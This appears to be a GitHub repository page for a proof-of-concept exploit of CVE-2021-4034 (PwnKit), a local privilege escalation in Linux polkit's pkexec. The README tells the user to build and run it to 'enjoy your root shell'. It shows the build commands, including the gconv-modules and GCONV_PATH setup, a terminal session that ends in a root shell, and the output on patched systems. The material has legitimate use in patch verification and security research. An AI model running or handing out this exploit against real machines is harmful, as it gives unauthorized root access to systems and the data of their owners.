Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up

CVE-2021-4034 pkexec - Linux Local Privilege Escalation

NotificationsYou must be signed in to change notification settings

keralahacker/CVE-2021-4034

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 

Repository files navigation

polkit privilege escalation exploit

Just executemake,./cve-2021-4034 and enjoy your root shell.

PoC

If the exploit is working you'll get a root shell immediately:

vagrant@ubuntu-impish:~/CVE-2021-4034$ makecc -Wall --shared -fPIC -o pwnkit.so pwnkit.ccc -Wall    cve-2021-4034.c   -o cve-2021-4034echo"module UTF-8// PWNKIT// pwnkit 1"> gconv-modulesmkdir -p GCONV_PATH=.cp /usr/bin/true GCONV_PATH=./pwnkit.so:.vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034# whoamiroot# exit

Updating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:

vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034pkexec --version|       --help|       --disable-internal-agent|       [--user username] PROGRAM [ARGUMENTS...]See the pkexec manual pagefor more details.vagrant@ubuntu-impish:~/CVE-2021-4034$

About Polkit pkexec for Linux

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).

Releases

No releases published

Packages

No packages published

Languages

  • C61.2%
  • Makefile38.8%

[8]ページ先頭

©2009-2025 Movatter.jp